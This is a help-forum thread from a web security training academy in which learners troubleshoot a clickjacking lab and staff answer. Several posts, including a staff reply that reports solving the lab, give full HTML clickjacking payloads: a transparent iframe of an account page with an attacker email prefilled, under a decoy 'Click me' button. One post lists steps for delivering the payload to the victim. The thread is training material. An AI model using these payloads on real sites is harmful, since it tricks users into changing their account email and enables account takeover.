Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Clickjacking with form input data prefilled from a URL parameter Lab Not Solved

kristof | Last updated: Oct 18, 2023 01:24PM UTC

Hey The lab just dont get solved its realy frustrading XD <style> iframe { position:relative; width:700px; height:500px; opacity:0.1; z-index:2; } div{ position:absolute; height:500px; top:450px; left:80px; z-index:1; } </style> <div>Click Me</div> <iframe src="https://0a8800a704fd1bf48185c5d700830048.web-security-academy.net/my-account?email=hacker1000@attacker-website.com""></iframe>

Ben, PortSwigger Agent | Last updated: Oct 19, 2023 07:20AM UTC

Hi Kristof, A couple of things to check. Firstly, have you logged into the 'wiener' account? Secondly, you do not need the second 'height' variable in the decoy web content section of the exploit - if you remove this and then use the view exploit is the 'Click me' element lining up with the corresponding button?

Kaustubh | Last updated: Aug 01, 2024 11:37AM UTC

tried this payload ``` <style> iframe { position:relative; width:1000px; height: 700px; opacity: 0.00001; z-index: 2; } div { position:absolute; top:470px; left:60px; z-index: 1; } </style> <div>Test me</div> <iframe src="https://0a350051042c6c6b804b0db2007a00ad.web-security-academy.net/my-account?email=hkdsfghjker@attacker-website.com"></iframe> ``` did the whole thing in chrome, but the lab is not getting solved. the Click Me is right above the update email button.

Michelle, PortSwigger Agent | Last updated: Aug 02, 2024 08:44AM UTC

Hi Thanks for getting in touch. In the payload you have sent above, you'll need to change the words 'Test me' to 'Click me' and the Store the changes before delivering them to the victim. Let me know if this helps.

Joshua | Last updated: Aug 05, 2024 10:02PM UTC

This does not work. Can the browser be chromium, does it have to be in Chrome? The victim never clicks the button. <style> iframe { position:relative; width:1000px; height: 700px; opacity: 0.00001; z-index: 2; } div { position:absolute; top:470px; left:60px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0ada0011038215db84cc18a300da0063.web-security-academy.net/my-account?email=Tester@hacked.com"></iframe>

Joshua | Last updated: Aug 05, 2024 10:21PM UTC

Also, I just tested this in Chrome. It appears that this lab now includes a CSRF token via a POST requests on /my-account/change-email, and changing the request type from POST to a GET request but the Method is not allowed.

Michelle, PortSwigger Agent | Last updated: Aug 06, 2024 02:38PM UTC

Hi We're looking into the reasons why the embedded browser is behaves differently, but if I use normal Chrome, I was able to solve this lab with the following: <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.1; z-index: 2; } div { position:absolute; top:440px; left:80px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://<LAB-ID>.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe> If you're still having issues when using Chrome can you send some screenshots or a screen recording of the steps you're taking to support@portswigger.net so we can have a closer look?

Haxmaul | Last updated: Sep 03, 2024 09:07PM UTC

I think it depends on the lab instance. Lab didn't work for me for several times and I was getting the Method error. I just kept going back to it once in a while trying again when I had a new lab ID. The final time when it worked I did the following: 1. I didn’t have Burps proxy browser open anywhere on my system. 2. Using Chrome browser I opened lab (clicked Access The Lab) 3. Logged in as Wiener 4. Opened Exploit Server 5. Tested below using my new Lab ID, opacity 0.1, and clicking view exploit 6. Adjusted width, height, top, left to get "Click me" in the correct position 7. Store (give it time if lagging) 8. Deliver to Victim My final code in the body: <style> iframe { position:relative; width:700; height:600; opacity: 0.0001; z-index: 2; } div { position:absolute; top:450; left:60; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0ab5009c03ed35bc82ab9c170013008d.web-security-academy.net/my-account?email=data23@attacker-website.com"></iframe>

Ben, PortSwigger Agent | Last updated: Sep 04, 2024 08:39AM UTC

Hi, We have been experiencing some intermittent performance issues with the Web Academy environment that has possibly impacted your ability to solve this lab. We are investigating this to see if we can find a root cause.

João | Last updated: Sep 24, 2024 09:27PM UTC

Having the same issue, is it still not fixed?

Ben, PortSwigger Agent | Last updated: Sep 25, 2024 08:29AM UTC

Hi João, To confirm, you are having issues solving the 'Clickjacking with form input data prefilled from a URL parameter' lab?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.